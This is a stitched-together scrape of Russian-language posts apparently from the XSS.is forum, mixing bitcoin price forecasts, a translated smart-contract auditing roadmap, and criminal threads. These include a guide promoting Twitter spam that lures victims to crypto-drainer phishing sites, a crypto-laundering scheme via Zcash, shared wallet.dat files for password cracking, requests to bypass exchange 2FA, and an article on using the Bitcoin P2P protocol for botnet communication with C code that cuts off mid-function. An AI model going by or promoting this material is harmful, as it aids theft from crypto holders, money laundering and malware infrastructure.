Популярный криптовалютный аналитик Dave the Wave, чьи прогнозы неоднократно оказывались правильными, считает, что к 2029 году курс первой криптовалюты может достичь $400 000.
В июле 2019 года аналитик предсказал снижение BTC с $11 600 до $6 000 к концу года, заявив, что первую криптовалюту ждет параболическое падение. Сейчас же он обновил свой долгосрочный прогноз, используя модели кривых на основе ценовой истории BTC. По его мнению, волатильность биткоина будет снижаться, но его еще ждут несколько взлетов и падений.

Согласно представленному графику, Dave the Wave ожидает роста первой криптовалюты до $130 000 к 2023 году и затем постепенное снижение до $40 000, то есть, до трети от максимальных значений. Затем курс биткоина будет постепенно расти до $400 000. При этом аналитик подчеркнул, что каждый новый цикл будет увеличиваться во времени.

Что же касается краткосрочных перспектив первой криптовалюты, то, по мнению аналитика Алекса Крюгера (Alex Kruger), в ближайшее время биткоин должен достичь $7 700, а затем последует откат до $6 400.

Недавно Росс Ульбрихт (Ross Ulbricht) говорил о том, что биткоин может снизиться до $3 200, а криптовалютный скептик Питер Шифф (Peter Schiff) считает, что после уполовинивания награды майнерам биткоин вовсе никому не будет нужен.

Аналитик, пожелавший остаться неизвестным, еще 21 января 2019 года спрогнозировал увеличение курса биткоина до $9200 к июлю и оказался прав.

Он разместил пост в одной из социальных сетей, в котором объявил, что в апреле биткоин вырастет до $5300, а в июле будет торговаться на уровне $9200. В середине апреля BTC действительно не только достиг отметки в $5300, но и продолжил демонстрировать восходящую траекторию движения.
По прогнозам этого же анонимного аналитика, в октябре 2019 года биткоин подорожает до $16 000, а в феврале 2020 года подскочит до $29 000. В июле будущего года монета будет стоить $56 000, а в ноябре вырастет до $87 000.

Примечательно, что эксперт написал не $87 000, а $87 00, но очевидно, что он имел ввиду трехзначный показатель. Общая капитализация криптовалютного рынка к концу 2020 года достигнет $1,5 трлн, а индекс доминирования биткоина составит 40-46%.

Эксперт отметил, что так называемое «дно» крипторынка было зафиксировано в середине декабря. В марте началась фаза накопления, продлившаяся три месяца. Теперь мы должны стать свидетелями длительного и устойчивого укрепления монеты, которая движется к новым максимумам.

Как думаете, реальный прогноз? Или очередное "bitcoin письмо из будущего"?

[ОРИГИНАЛЬНАЯ СТАТЬЯ](https://sm4rty.medium.com/roadmap-for-web3-smart- contract-hacking-2022-229e4e1565f9)
ПЕРЕВЕДЕНО СПЕЦИАЛЬНО ДЛЯ XSS.IS
$600 на SSD для --->bc1qhavqpqvfwasuhf53xnaypvqhhvz966upnk8zy7 для поднятия ноды ETHEREUM и тестов

1. Изучите основы блокчейна и Ethereum.

Первый шаг — нам нужно изучить основы технологии Blockchain и различные термины, такие как блоки, узлы, майнинг, хеширование и т. д. Затем мы можем изучить основы Ethereum. Изучение основ блокчейна даст нам общее представление о том, как работает эта технология, и даст вам представление о том, с чем мы имеем дело.

Что такое Блокчейн?

Блокчейн — это распределенная база данных или реестр, который совместно используется узлами компьютерной сети. В качестве базы данных блокчейн хранит информацию в электронном виде в цифровом формате. Ethereum — это протокол блокчейна, такой как биткойн. В отличие от Биткойна, Ethereum является завершенным по Тьюрингу, что означает, что он может приблизительно имитировать вычислительные аспекты любого другого реального мира, компьютера общего назначения и запускать программы.

Дальнейшее чтение
https://www.investopedia.com/terms/b/blockchain.asp

https://github.com/ethereumbook/эфириумбук

Click to expand...

2. Смарт-контракты и язык программирования.​

Далее мы можем узнать о смарт-контрактах и о том, как писать смарт-контракты с использованием таких языков программирования, как Solidity или vyper. В настоящее время Solidity является наиболее часто используемым языком программирования для написания смарт-контрактов.

Что такое смарт-контракты?

Смарт-контракты — это просто компьютерные программы, работающие в сети блокчейн. Эта концепция была впервые придумана ученым-компьютерщиком и криптографом Ником Сабо в конце 1990-х годов. Однако сначала они были реализованы протоколом Ethereum.
Что касается Solidity, мы можем узнать об этом из различных источников, таких как документация, учебные пособия YouTube, блоги и т. д. Ниже я предоставлю ссылки на некоторые из этих ресурсов.

Дальнейшее чтение:
<https://lifemathmoney.com/what-is-a-smart-contract-explained-with-real- world-examples/>

https://cryptozombies.io/ru/course/
https://docs.soliditylang.org/en/latest/
https://solidity-by-example.org/

Click to expand...

3. Изучите среды тестирования, такие как hardhat/foundry ​

Затем мы можем изучить среды тестирования, такие как hardhat/foundry, которые помогают нам запускать смарт-контракты в локальной среде и запускать тесты для смарт-контрактов. Мы также можем использовать Remix IDE для этой цели, но для больших проектов гораздо лучше настроить локальную среду тестирования. Таким образом, изучение этих фреймворков имеет много преимуществ и плагинов, которые полезны при тестировании или написании POC для наших атак.
Существует множество фреймворков для тестирования. Но самые известные из них:
Foundry : в Foundry тесты и сценарии написаны на Solidity.
Hardhat : в Hardhat тесты и сценарии написаны на Javascript.
Brownie : в Brownie тесты и скрипты написаны на Python.

Дальнейшее чтение:
https://book.getfoundry.sh/
https://hardhat.org/docs
https://eth-brownie.readthedocs.io/en/stable/

Click to expand...

4. Изучите основы финансов.​

Это то, на чем мало кто сосредотачивается на обучении. Но будет время, когда вы проводите аудит проекта DeFi, в котором используется множество традиционных финансовых терминов, и вы ничего не понимаете. Когда вы посмотрите на эти термины, вы получите определения, которые относятся к еще большему количеству терминов, которых вы не знаете. Таким образом, изучение финансов очень важно в веб3, так как большинство проектов связаны с финансами.
В проектах DeFi мы будем иметь дело с некоторой финансовой терминологией, такой как акции, книга заказов, рынок, биржи, DEX, опционы и многие другие. Ниже я разместил ссылки на несколько ресурсов для изучения финансов.

Дальнейшее чтение:
https://academy.binance.com/en
https://teachyourselfcrypto.com/#ftoc-децентрализованные-биржи- dexs
<https://www.khanacademy.org/economics-finance-domain/core- finance/derivative-securities>

Click to expand...

5. Векторы атак DEFI: ​

DeFi предоставляет финансовые инструменты, не полагаясь на посредников, таких как брокерские конторы или банки. Эти приложения позволяют пользователям сохранять, брать взаймы, одалживать и торговать без каких-либо комиссий (которые получает любая финансовая компания, такая как банк).
Это некоторые часто используемые протоколы в большинстве проектов DeFi. Хорошо познакомиться с ними и глубоко понять, как они работают и их нюансы.

• MasterChef : MasterChef от Shushiswap — это контракт на размещение, по которому пользователи вносят токены пула ликвидности (LP) и получают вознаграждение, пропорциональное их time * stakeAmount.
• Compound : Compound является основой для всех децентрализованных протоколов однорангового кредитования. Вы должны это знать, поскольку многие примитивы DeFi каким-то образом взаимодействуют с протоколами кредитования.
• UniswapV2 : несмотря на то, что Uniswap уже находится на версии 3, Uniswap V2 значительно проще, менее запутан и по-прежнему является основой для понимания автоматизированных маркет-мейкеров (AMM) в целом.
• Aave : Aave позволяет пользователям занимать цифровые активы и получать проценты по депозитам/ссудам — благодаря тому, что это децентрализованный протокол кредитования с открытым исходным кодом, построенный на платформе Ethereum.
• Balancer : Balancer является наиболее гибким и универсальным автоматизированным маркет-мейкером, предоставляющим разработчикам беспрецедентные возможности настройки.

Векторы атак DeFi:
После изучения DeFi, т.е. децентрализованных финансов, следует изучить некоторые общие направления атак и способы их смягчения. Ниже приведены несколько векторов атак DeFi и меры по их устранению:
_1. Флэш-кредит – манипулирование ценой с оракулом
2. Повторная атака
3. Натяжка ковра. _

Дальнейшее чтение:
https://teachyourselfcrypto.com/#ftoc-module-4-decentralized-finance-defi
<https://academy.moralis.io/blog/defi-deep-dive-explaining-defi-attack- vectors-and-prevention>
https://crypto.com/research/attacks-and-exploits-in-defi

Click to expand...

6. Изучите часто используемые библиотеки и стандарты токенов: ​

Существуют определенные контракты, шаблоны или даже алгоритмы, с которыми вы будете сталкиваться снова и снова в течение своей аудиторской карьеры. Хорошо познакомиться с ними и глубоко понять, как они работают и их нюансы.

• Контракты токенов : наиболее часто используемыми стандартами токенов являются EIP20 для взаимозаменяемых токенов и EIP721 для NFT. Есть еще много, но эти два — все, что вам нужно знать в начале. Существуют также другие стандарты, такие как ERC777, ERC1155, ERC2646, ERC2981 и т. д.
• Обновляемые контракты : контракты Ethereum не обновлению. Если вы хотите обновить код, вам необходимо развернуть новый контракт. Существует множество различных реализаций прокси, взгляните на OpenZeppelin Proxy .
• Вспомогательная библиотека Openzeppelin: это библиотека для разработки безопасных смарт-контрактов. Стройте на прочной основе кода, проверенного сообществом.
  я. Реализации таких стандартов, как ERC20 и ERC721 .
  II. Гибкая разрешений на основе ролей схема
  III. Многоразовые компоненты Solidity для создания пользовательских контрактов и сложных децентрализованных систем.

Дальнейшее чтение:
https://github.com/OpenZeppelin/openzeppelin- контракты

https://www.youtube.com/watch?v=JgSj7IiE4jA
https://ethereum.org/en/developers/docs/standards/tokens/

Click to expand...

7. Изучите распространенные ошибки смарт-контрактов, инструменты и лучшие

практики ​

Реестр SWC предоставляет набор классификаций, содержащих список известных на сегодняшний день атак. Реестр SWC предоставляет идентификатор (ID) SWC, заголовок и список примеров, связанных с кодом.
Существуют общие факторы атаки, на которые должен обратить внимание аудитор смарт-контрактов, такие как проблемы с контролем доступа, целочисленные переполнения и недополнения, а также уязвимости повторного входа (для DApp, написанных на Solidity).

Наиболее распространенные инструменты:
я.Slither** :** Обнаруживает уязвимый код Solidity с низким уровнем ложных срабатываний.
II.Echidna** :** Echidna — это программа, предназначенная для фаззинга/тестирования на основе свойств смарт-контрактов Ethereum.
III.Surya** :** Предоставляет ряд визуальных выходных данных и информацию о структуре контрактов.
IV.[Eth Security Toolbox](https://github.com/trailofbits/eth- security-toolbox)** :** это контейнер Docker, предварительно установленный и настроенный со всеми инструментами безопасности Ethereum от Trail of Bits.

Лучшие практики Solidity:
Вы можете ознакомиться с рекомендациями по Solidity из [consensys ](https://consensys.net/blog/developers/solidity-best-practices-for-smart- contract-security/)или предпочесть блог Secureum ( 1 и [часть ](https://secureum.substack.com/p/security-pitfalls-and-best- practices-101)) для понимания лучших практик обеспечения безопасности.

Дальнейшее чтение:
https://swcregistry.io/
https://secureum.substack.com/p/audit-techniques-and-tools-101
[https://secureum.substack.com/p/security-pitfalls-and-best- practices-101](https://secureum.substack.com/p/security-pitfalls-and-best- practices-201)
https://secureum.substack.com/p/security-pitfalls-and-best-practices-201

8. Выполняйте задания CTF.​

После того, как мы изучили основы Ethereum, Solidity и Testing Frameworks, а также некоторые распространенные уязвимости смарт-контрактов. Затем мы можем перейти к CTF, чтобы проверить наше изучение всех наших знаний. Существует множество CTF для Smartcontract, таких как Ethernaut, Damnvulnerabledefi или Capture The Ether, вы можете их заполнить. Также, если вы хотите решить более сложные CTF, вы можете попробовать paradigm ctf. Ниже приведены ссылки на эти CTF.

1. Ethernaut компании Openzeppelin
2. Захват эфира
3. Чертовски уязвимый DeFi
4. Парадигма CTF-2021
5. Шифршаста

9. Читайте аудиторские отчеты и постмортемные блоги: ​

Это самый важный этап, постарайтесь прочитать как можно больше отчетов. Это поможет вам понять различные логические ошибки и поможет вам понять мыслительный процесс, который аудит.
Вы можете найти отчеты об аудите многих протоколов по ссылке ниже:

• Иммунофи Среда
• quillaudits
• блоги openzeppelin
• Консенсус Аудит
• Отчеты об аудите Code4rena
• Выводы аудита Secureum 101
• Выводы аудита Secureum 201

10. Непрерывное обучение и исследования ​

Web3 очень динамичен по своей природе. Поэтому вам нужно быть в курсе всех исследований и новых атак. Вы можете следить за приведенными ниже ресурсами, чтобы быть в курсе последних новостей, атак, исследований и т. д.
Информационные бюллетени : Blockthreat , HashingBit , Immunefi
Сообщества Discord : Immunefi , Secureum , Blockchain , QuillAudits и т.
Блоги : Immunefi , Coinmonk , TrailOfBits , Secureum Openzeppelin , QuillAudits и др.
Твиттер : Будьте активны в Твиттере и следите за последними исследованиями и направлениями атак.

[НЕОБЯЗАТЕЛЬНО] Изучайте математику:​

Дополнительная литература: [https://medium.com/@TrustChain/do-y...tarted-in- smart-contract-hacking-443ff52b418d](https://medium.com/@TrustChain/do-you- need-math-to-get-started-in-smart-contract-hacking-443ff52b418d)

[-] Начните свое путешествие по Bug Bounty​

Код4рена
Hakenproof
Хакероне

<https://medium.com/immunefi/hacking-the-blockchain-an-ultimate- guide-4f34b33c6e8b>
https://cmichel.io/how-to-become-a-smart-contract-auditor/
https://secureum.substack.com/
[Карта разума аудиторов RazzorSec](https://coggle.it/diagram/YqLzaiSABzXD4UnZ/t/smart-contract- auditor)

КАЖДЫЙ ДЕНЬ ПИШИ КОД.
КАЖДЫЙ ДЕНЬ ЧИТАЙ НОВУЮ СТАТЬЮ СВЕРХУ ПЛАНА ОБУЧЕНИЯ.
СПРОСИ ЕСЛИ НЕ ПОНЯТНО В КОММЕНТАРИЯХ - ГЛУПЫХ ВОПРОСОВ НЕ БЫВАЕТ.
ВСЕМ ПРИЯТНОГО РАЗВИТИЯ

Подскажите, майнинг жив или нет? Интересует в первую очередь биток и топ-10 валют
как, хотя бы примерно, расчитать доход, например, на 12 x 1080TI? какое оборудование сейчас стоит использовать?
я не вошел в майнинг в 2016-17м, но сейчас появились свободные 20-30к$, думаю, начать ли вникать в эту тему?

Заводим грязную крипту на кошель обменник exodus, переводим в zcash и через перевод сковзь z-addr получаем анонимную(не в курсе про анонимизицию через z-addr? - читай на сайте зикеша.).
(естественно торы, впны, виртуалки, чистые носки, боевые сто грамм, завещание у нотариуса, семья за границей,...). Вопрос какие слабые места в схеме? (именно в схеме ..->exodus->zec.., про комиссии кошеля и ненадежность Абдула хостинга рассказывать не нужно).

​

Twitter — это первоисточник криптоновостей и событий, связанных с Web3 ⛓ Криптаны первым делом публикуют анонсы любых своих проектов именно там, а уже потом эта информация разлетается по иным соцсетям По этому, было бы глупо, нам, комьюнити XSS, обойти стороной столь жирный источник криптотрафика и как следует не заработать на этом

В общем, я никогда не любил долгие предисловия, посему сразу приступим к делу — как в данный момент скамеры зарабатывают миллионы долларов путём спама на крипто драйнер в сервисе Илона Маска?
Crypto Drainer — это скрипт встроенный в фишинговый сайт, который взаимодействует с кошельками пользователей для подписания вредоносных транзакций и незаметного списания всех токенов и NFT из их кошельков.

Вся предоставленная ниже информация изложена исключительно в ознакомительных целях! Автор ни в коем случае не призывает проводить данные манипуляции Не занимайтесь такими вещами, реально ​

Click to expand...

МЕТОДЫ СПАМА, КОТОРЫЕ ПО СЕЙ ДЕНЬ ПРИНОСЯТ MONEY:​

1. _

Упоминания: Retweet/ретвиты (цитировать). ​

_

2. _

Сообщения. ​

_

1. Retweet — массовые отметки

​

Если вы активный пользователь Twitter, то наверняка сталкивались с тем, что вас постоянно упоминают в различных сомнительных сейлах и дропах:

Если кликнуть на данный пост и обратить внимание на количество ретвитов, то путём элементарной математики можно посчитать, что в общем и целом аферисты проспамили 12800*13=166400 человек — неплохие объёмы:

Было бы неплохо узнать, сколько же данная операция принесла денег нашим уважаемым товарищам скамерам

Code:Copy to clipboard

Заходим на сайт>коннектимся>достаём кошелёк: 0xd13b093EAfA3878De27183388Fea7D0D2B0AbF9E

На счету лицезреем вполне внушительную сумму:

Видим, что поступления в основном небольшие, можно даже сказать копеечные:

Однако, не редкость и залёты более 1 ether, что уже достаточно серьёзный результат:

Но не удивляйтесь раньше времени, все вышеуказанные суммы с данного промежуточного адреса скамеров — ничто, по сравнению с тем, какое количество денег они аккумулируют на своём main кошельке:

_

https://etherscan.io/address/0x84527b5949d479c879b8dd71cd8f79048cdf6fb8

_
МИЛЛИОН ДОЛЛАРОВ США С ЭЛЕМЕНТАРНЕЙШЕГО ИСТОЧНИКА ТРАФИКА О КОТОРОМ Я РАССКАЗЫЮ ВАМ БЕС -ПЛА -ТНО — ДОСТОЙНО, НЕ ПРАВДА ЛИ?

Тот метод кражи что юзали данные особы, кстати, драйнером то даже назвать неловко, ведь использовали они банальный трансфер, повестись на который, как мне казалось, могут только лютые лохмачи :

Будь у них драйнер с функцией APPROVE/PERMIT для токенов и setApprovalForAll/SEAPORT для NFT — возможный доход выходил бы за рамки приличия.

2. Сообщения — банальный спам в личку

​

Тут, собственно, как и в предыдущем варианте — ничего удивительного Кто-то присылает ссылку на твит, в котором, якобы, анонс бесплатной NFT- коллекции от популярного креатора:

Жмякаем на твит и видим выразительно оформленный пост со ссылкой на фишинговый драйнер сайт:

Кто-то из вас спросит, действительно ли работает столь элементарный метод привлечения трафика и клюёт ли кто-то на такие вещи по сей день? смотрим

Мы наглядно можем убедится — что да вышеперечисленные источники трафика хоть и древние как мир, но по-прежнему работают и приносят хороший доход а на сколько именно хороший — зависит от вас и ваших стараний Вот, к примеру, взять один из крайних крупных инцидентов, когда челики зафейкали страницу раздачи Aptos и за 24ч залутали порядка 700 ETH ($1m) можете ознакомится по ссылке:

__https://twitter.com/x/status/1584955933452484613

А что мешает каждому из нас просто взять, и запустить свой личный поток трафика, который на постоянной основе будет генерировать неплохие котлеты денег? Правильно — НИ ЧЕ ГО! Пожалуй, прямо сейчас этим и займусь А вам желаю не упустить этот момент и начать предпринимать хоть какие-то действия, пока темка всё ещё пуляет Ну, а если у кого-то из вас абсолютно нет возможности и представления как реализовать сей процесс привлечения трафика — ожидайте следующую часть статьи, в которой я поведаю вам где взять качественный криптодрайнер без дырок и у кого арендовать необходимый софт для работы с твиттером, а так-же поясню практически за все нюансы работы с данной платформой и постараюсь каждого из вас за ручку довести до профита

СТАТЬЯ ЧАСТЬ 2 — В СООБЩЕНИИ НИЖЕ

Предлагаю в этой теме публиковать кошельки BTC, к которым в данный момент пароль так и не подобран.
Кто-то успешно зарабатывает на продаже этих самых кошельков (пример - https://allprivatekeys.com/wallet.dat), но я считаю для сообщества XSS такие файлы должны быть доступны на безвозмездной основе.
Для просмотра баланса понятное дело у вас должен быть Bitcoin Core и вся скаченные блоки на данный момент.
Так же в теме приветствуется коллективное обсуждения относительно возможных наборов словарей к .dat файлам, их происхождение, программное обеспечение для подбора паролей на разных платформах (не только HashCat) и т.п.

Загрузить -

Hidden content for authorized users.

https://mega.nz/folder/V80QVC7Z#-PiS_auAhY7mVkU0c45_sg

Перезалито на мегу. Убран неактуальный кошелек на 69к BTC.

Народ щас вроде в хайпе приложение
Hamster kombat, играя в игру можно срубить бабла,я в этом новичок особо подскажите научите как можно срубить бабла или не срубить,вообщем нужна ваша помощь как эта тема работает, помогите пожалуйста.
Пишите сюда или мне в ЛС.

После обновы пароль не подходит.
Ищу профессионала кто забрутить, кош мой,пароли есть, даю только хэш.
Черти,бесы,малолетки, посредники не пишите.

Неоднократно встречал объявления

Снимаю 2FA с бирж Bittrex, Binance, Bitfinex, Coinbase, Blockchain, Poloniex, HitBTC и других и вывожу деньги 50/50

Click to expand...

Никогда не нуждался в сабж услугах, но теперь возникла необходимость.
Приходится копнуть и изучать тему
Поделитесь инфой или просто мыслями, как именно снимают двухфакторки? как селлеры обходят антифроды бирж?
А если кто-то сам метод сольет, так вообще буду премного благодарен )

Добрый день!
Здесь буду постить прогнозы и аналитику по курсу биткоина. Обычно собираю с разных телеграм каналов или трейдинговых сообществ.

Коротко о торгах с 24 сентября по 1 октября

За неделю с 24 сентября по 1 октября на бирже Bitfinex биткоин подешевел на 1,62%, до $6601. Для криптовалют неделя прошла относительно спокойно. Рынок остался без драйверов, поскольку SEC протянул время и не стал принимать решение по ETF. Регулятор его отложил на неопределенный срок для более детального изучения деривативов на биткоин.

Краткосрочная активность наблюдалась в альткоинах. Положительную динамику для всего рынка создавали Bitcoin Cash, Ripple и LTC. После нисходящих коррекций эти монеты дорожали к доллару США на 25%.

Монета Ripple подорожала на новостях, что Coinbase Custody рассматривает новые активы для включения в листинг, среди которых был Ripple.

Bitcoin Cash на минувшей неделе тоже поддержали две новости. Первая из них — биржа Gemini получила одобрение от нью-йоркских регуляторов на листинг BCH. Вторая хорошая новость заключалась в том, что Bitmain подал заявку на проведение IPO. Вслед за Bitcoin Cash подорожал Litecoin. За ним последовал рост курса биткоина.

Курс биткоина повышался до $6826. Без новых драйверов покупателям не удалось пройти зону сопротивления на отметке $6900. Цена стабилизировалась на уровне $6600. Из-за четырехдневного бокового тренда в паре BTCUSD технические индикаторы стали сигнализировать о его ослаблении. Аналогичная ситуация сейчас наблюдается в альткоинах: ETHUSD, LTCUSD, BCHUSD, XRPUSD

Click to expand...

Если учитывать временной фактор, то по циклам крипторынок находится в переходной фазе с «медвежьего» тренда на «бычий». Для ралли биткоина нужно, чтобы альткоины синхронизировались между собой (постояли на одном уровне около 2-3 дней). В этом случае дневные индикаторы начнут сигнализировать об их покупках. Вот тогда можно ожидать пробой уровня $6900 и укрепление до $8600 за биткоин.

На дневном графике я показал идеальный вариант для старта:
1. Стохастик перемещается в зону покупок.
2. Курс btc снижается до 6255.
3. Рикошет от 6255 к трендовой линии.
4. Непродолжительный флэт по 6900
5. Пробой и рост до 7840 по каналe D-D.

Также показал и другой вариант, если вниз не пойдём, а цена простоит под 6900 до 8.10. В альтах стохастик тоже должны переместиться в зону покупок иначе не получится всем стартануть на одном энтузиазме без новостных драйверов.

Click to expand...

Последний обзор по биткоину я писал 2 октября. К 6 октября ситуация на рынке не изменилась. Текущий курс $6574. На данный момент цена устраивает продавцов и покупателей. Она находится в боковом тренде с 8 сентября. За это время сформировался ценовой диапазон в 740 долларов.

На шестичасовом ТФ границы диапазона сузились до 224 долларов. По моим расчетам цена должна выйти из него в воскресенье. Спекулянты либо расширять диапазон, либо рынок продолжит флэтить в ожидании новостных драйверов.

Я нахожусь в лагере быков и настроен на укрепление биткоина. Покупатели перед вчерашним закрытием на торгах в Азии попытались пробить трендовую линию (H7429 – H6826). Попытка не увенчалась успехом. Цена вернулась с 6741 на 6575. Покупатели не стали сопротивляться, поскольку уперлись в лимитные ордера. Это значит, что на пути к 6800 ещё много продавцов. На свече 23:00 на уровне 6635 продавцы через лимитки сдержали атаку покупателей.

Прогноз на рост от 2.10 не стал корректировать. Перед ростом цена может вернуться к 6520. Если цена срикошетит от него до 6610, то с вероятностью 80%, будет пройдена трендовая на 6780 и потом горизонтальное сопротивление 6850.

Click to expand...

Покупатели на торгах в Азии (07.10.18 в 20:00 UTC) предприняли попытку рвануть вверх, но выдохлись через пару минут около отметки 6640. Все как обычно, две минуты активности - длительный флэт. За семь часов продавцы отыграли азиатские потери. Цена скатилась с 6640 до 6585.

Покупателям не хватает новостных драйверов, чтобы развернуться на полную катушку. Не исключаю, что участники рынка находятся в ожидании запуска введения нового обновления Constantinople в сети Эфириум, которое было отложено до 14 октября. Оно может повысить интерес к покупкам эфира и других альткоинов.

Сегодня давление на крипторынок оказал слух о неплатежеспособности биржи Bitfinex. Руководство биржи опровергло обвинения в свой адрес. Рынок стабилизировался и ближе к открытию покупатели предприняли ещё одну попытку возобновить рост. Курс биткоина вырос до 6730, курс эфира - до 234.

Покупателям в биткоине сейчас нужно пройти 6741, чтобы спровоцировать продавцов закрывать короткие позиции, которые открывались ниже 6700 в ожидании прорыва вниз. Техническая картина на стороне покупателей, поэтому у них все козыри чтобы пройти сегодня 6850.

Click to expand...

Добрый.
Есть кошель биткоин, на котором в 2013 года лежало 633 битка.
подскажите что с ним можно сделать?
иожет кто купит для скама или других каких нибудь своих тем?

Через какие сервисы сейчас удобно выводить bitcoin в нал?
раньше все пользовались advcash, потом мастеркард прикрыл это все дело. и не только для advcash, для многих
какими картами и сервисами люди пользуются сейчас?

Кошельник

- Exodus - еще не все знают что он под мусорами
- USDT вообще блокируют по запросу
- USDC полнейшая регуляция

+ Wasabi Wallet - дефакто стандарт индустрии но они выключают CoinJoin, но нельзя сказать что они стучат
+ Sparrow Wallet - из видных остался еще, тоже выключают свой миксер Whirlpool client и Soroban
+ Electrum - как один из старейших холодным кошелько потому что опен-сорс. Тут понятно
+ Bitcoin Core - первый воллет, без регуляции https://github.com/bitcoin/bitcoin/releases
+ Feather Wallet - XMR https://featherwallet.org/

- Samorai Wallet - некоторые пользовались но основателей приняли за миксер и монеты сейчас хрен вытащишь

? JoinMarket - BTC, реализация CoinJoin. Аккуратно, могут прижать девов в любой момент https://joinmarket.net/
? Atomic Wallet - пока нет информации, но был крупный взлом
? Electrum
? SafePal
? ронин валлет
? с98
? Ledger

Биржи

tradeogre.com - централизованная но без регуляций, моментальный ввод-ввывод без KYC. Но не большая ликвидность и немного пар
bisq.network - децентр, интересный концепт. Кто пользовался?
blockdx.net - децентр. интересный концепт, по замороченно. Кто пользовался?

Дискас!
Может составим набросаем варианты нормальных кошельков, желательно с миксером и я обновлю этот топик?

Всем привет!

Пришла в голову идея создать тему, где буду публично делиться своими лучшими идеями для заработка на криптовалютном рынке. Никакого трейдинга, фьючерсов и прочих разводов. Только нормальные мувы)

Чтото с вложениями, чтото без вложений.

Будет ли вам такое интересно? Отпишите

сегодня захожу, как ни в чем не бывало, на графике -12% и -850$ цены
потерь - море (
битку - пиздец? или попытки расшевелить и организовать вкусный прострел вверх?
как думаете?

Bitcoin P2P PROTOCOL

План:

1)Права, защищающие этот документ.

2)Пролог.

3)Техническое описание протокола.

4)DNS seed.

5)STUN: getting external IP address.

6)Эпилог.

Click to expand...

Текст:
1)

Во-первых данный документ носит лишь исследовательский характер и не является призывом к совершению
неправомерных поступков, нарушающих законодательство вашей страны!
Во-вторых незаконное копирование частей текста и любых других его составляющих карается законом
по защите авторских прав собственности!
Разрешено копирование на ваш ресурс, только с указанием автора текста, а также гиперссылки на
оригинальную тему.

Click to expand...

2)Пролог
Вообщем-то различные методы осуществления коммуникации между ботами в сети прежде были описаны мною
в этой статье: https://xss.is/index.php?topic=23932 (блог https://dlab.im/blog/23.html )
Из всех предложенных способов, я решил выбрать в качестве тестов 11 метод "Bitcoin".

В 2х словах: bitcoin - это P2P ЭПС(электронная платёжная система) написанная на C++ с Qt Framework.
Хорошей документации, в целом, по исходному коду и протоколу нет. Основные изменения в протоколе
публикуются в основном как BIP(bitcoin improvement proposals) на github/sourceforge.
Начиная с 08 года(момент публикации автором bitcoin) альфа-версии 0.1, происходит постепенная
"рассортировка" кода(блоки кочуют из одного файла в другой), вследствие чего, весь код наслаивается
будто лапша. Впрочем, это только моё мнение

Click to expand...

_
Транзакции в сети проходят с участием пользователей, которые считают DOUBLE- SHA256 хэш от блока, набитого
присланными данными. Эти действия(выполнение proof-of-work) позволяют поддерживать стойкость сети
к различного рода атакам(примером может служить: double-spending attack).

Подробно об устройстве вы можете почитать в официальном доке: bitcoin.org/bitcoin.pdf
_


Будучи хорошо распиаренной системой, текущая стоимость всех добытых денег в системе почти 10
миллиардов долларов(статистика - coinmarketcap.com).

Click to expand...

3)Техническое описание протокола
Bitcoin использует TCP для передачи данных между нодами.
Существуют всего 2 сети: основная(порт 8333) и тестовая(порт 18333). Сеть поддерживает IPv4, IPv6 адреса.

Структура пакета:

Я выделил 14 основных команд: version, verack, getaddr, addr, inv, getdata, getblocks, getheaders, tx, block, headers, alert, ping, submitorder, checkorder, reply.

version - информация о версии bitcoin и количестве блоков. Передаётся при первом подключении.
verack - передаётся в ответ на пакет "version".
getaddr - запрос на список доступных нодов.
addr - список IP адресов с портами.
inv - передаётся, когда нод получает новый блок с транзакциями.
getdata - запросить блок или транзакцию по хэшу.
getblocks - запросить блоки в виде пакета "inv" в определённом промежутке.
getheaders - запросить блоки в виде пакета "headers" в определённом промежутке.
tx - отправить транзакцию. Этот пакет передаётся в ответ "getdata".
block - отправить блок. Этот пакет передаётся в ответ "getdata".
headers - отправить 2000 заголовков блоков.
alert - отправить предупреждающее сообщение(сообщение верифицируется и только ведущий разработчик,
т.е хозяин закрытого ключа может его отправить).
ping/pong - просто проверка того, что соединение до сих пор актуально.
submitorder, checkorder, reply - используется при транзакциях на IP адрес.

Существуют 2 способа(документированных) найти пиры:
(I) DNS seeds(парсинг IP из ответа TYPE_A DNS серверов).
(II) Вшитый в bitcoin клиент список IP пиров.

При подключении, мы посылаем пакет "version", который содержит в себе: версию клиента, номер блока и
локальное время. Нод верифицирует пакет и в случае успеха шлёт нам "verack", а затем свой пакет "version".

Затем, чтобы обменяться списками нодов или же получить актуальный список, мы шлём пакет "getaddr".
Нод отвечает пакетом "addr", содержащим список подключённых к нему других нодов.

До 0.6 версии был ещё способ получения пиров через IRC сеть, но его ликвидировали.
Я описал необходимый минимум для создания базового проекта, приступим к рассмотрению его частей.

4)DNS seed
Я упомянул выше, что в процессе поиска пиров используется парсинг IP из ответа TYPE_A DNS серверов.

DNS сервера для основной сети:

WCHAR *MainNetDNSSeed[] = { L"seed.bitcoin.sipa.be", L"dnsseed.bluematt.me",
L"dnsseed.bitcoin.dashjr.org", L"bitseed.xf2.org" };

Click to expand...

DNS сервера для тестовой сети:

WCHAR *TestNetDNSSeed[] = { L"testnet-seed.bitcoin.petertodd.org", L"testnet-seed.bluematt.me" };

Click to expand...

Исходник:

#define DNS_BUFFER_SIZE 0x1000

HANDLE dns_request(WCHAR *pHost) {
HANDLE hEvent, pDnsBuf, pPeerList;
SOCKET pSocket;
DWORD DnsBufSize, RecvSize;
sockaddr_in sAddr, rAddr;
PDNS_RECORD pDnsRecord;

pDnsBuf = AllocMem(DNS_BUFFER_SIZE);
if(!pDnsBuf) {
return FALSE;
}

pPeerList = AllocMem(4096);
if(!pPeerList) {
return FALSE;
}

DnsBufSize = DNS_BUFFER_SIZE;

if(!DnsWriteQuestionToBuffer_W((PDNS_MESSAGE_BUFFER)pDnsBuf,&DnsBufSize,pHost,DNS_TYPE_A,\
GetTickCount(),TRUE)) {
goto exit_2;
}

sAddr.sin_family = AF_INET;
sAddr.sin_port = htons(53);
sAddr.sin_addr.s_addr = 0x04040808; // google public dns server

pSocket = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP);
if(pSocket == INVALID_SOCKET) {
goto exit_2;
}

hEvent = WSACreateEvent();
if(WSAEventSelect(pSocket,hEvent,FD_READ)) {
goto exit_1;
}

if( ( sendto(pSocket,(char *)pDnsBuf,DnsBufSize,NULL,(sockaddr *)&sAddr,\
sizeof(sAddr)) ) != DnsBufSize ) {
goto exit_1;
}

if(WaitForSingleObject(hEvent,5*1000)) {
goto exit_1;
}

DnsBufSize = sizeof(rAddr);
RecvSize = recvfrom(pSocket,(char *)pDnsBuf,DNS_BUFFER_SIZE,NULL,\
